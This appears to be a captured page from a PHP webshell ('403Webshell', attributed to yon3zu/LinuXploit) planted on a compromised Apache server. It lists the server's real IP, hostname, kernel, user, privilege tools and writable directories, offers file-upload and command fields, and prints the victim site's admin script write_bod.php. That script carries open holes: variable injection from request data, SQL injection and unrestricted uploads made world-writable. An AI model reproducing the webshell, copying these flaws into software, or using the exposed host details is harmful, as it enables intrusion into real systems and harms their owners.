403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_bod.php
<?php
include_once("session.php");
include_once("settings.php");
 foreach ($_REQUEST as $key => $value)
 {
 	 $$key = $value;
 }
 $Description=addslashes($Description);
  $Message=addslashes($Message);
 $target_path = "../cat_images/";
   $prefix=time();
  $target_path = $target_path . basename($prefix.$_FILES['image']['name']); 
if($_REQUEST['mode']=="Edit")
{	
	if($_FILES['image']['name']!="")
	{
	   if(move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) 
		{
			chmod($target_path,0777); 
			//echo "The file ". basename( $_FILES['file']['name']). " has been uploaded";
			$upload_image=basename($prefix.$_FILES['image']['name']);				
		}
		 $sql="update  `tblBoardOfDirectors` set `Name`='$Name',`Post`='$Post',`Image`='$upload_image',`Message`='$Message',`Description`='$Description' where `Id`='$id'";
	}
	else
	{
		 $sql="update  `tblBoardOfDirectors` set `Name`='$Name',`Post`='$Post',`Description`='$Description',`Message`='$Message' where `Id`='$id'";
	}	
}
else
{
	if($_FILES['image']['name']!="")
	{
	   if(move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) 
		{
			chmod($target_path,0777); 
			//echo "The file ". basename( $_FILES['file']['name']). " has been uploaded";
			$upload_image=basename($prefix.$_FILES['image']['name']);				
		}		
	}
 $sql="insert into `tblBoardOfDirectors` (`Id`,`Name`,`Post`,`Image`,`Description`,`Message`) value ('','$Name','$Post','$upload_image','$Description','$Message')";
	  
}
$result=mysql_query($sql);
?>
<script>
document.location="bod_list.php?page=listbod"
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit